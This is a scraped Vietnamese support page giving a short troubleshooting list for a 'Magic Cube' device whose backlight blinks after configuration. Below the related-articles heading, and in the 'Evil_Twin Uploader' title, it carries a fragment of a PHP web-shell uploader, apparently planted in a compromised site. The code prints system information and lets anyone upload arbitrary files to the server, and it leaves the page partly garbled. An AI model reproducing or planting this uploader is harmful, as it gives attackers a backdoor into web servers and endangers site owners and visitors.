Evil_Twin Uploader

Đèn nền của thiết bị nhấp nháy sau khi đã được cấu hình?

Xin bạn vui lòng kiểm tra lại như sau:

1) Kiểm tra lại cài đặt của bộ định tuyến, chẳng hạn như bảo vệ an ninh, tên người dùng được yêu cầu, mật khẩu để kết nối.
2) Mật khẩu nhập sai
3) Router DHCP bị đóng.
4) Router ngăn chặn không cho thiết bị Magic Cube kết nối.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial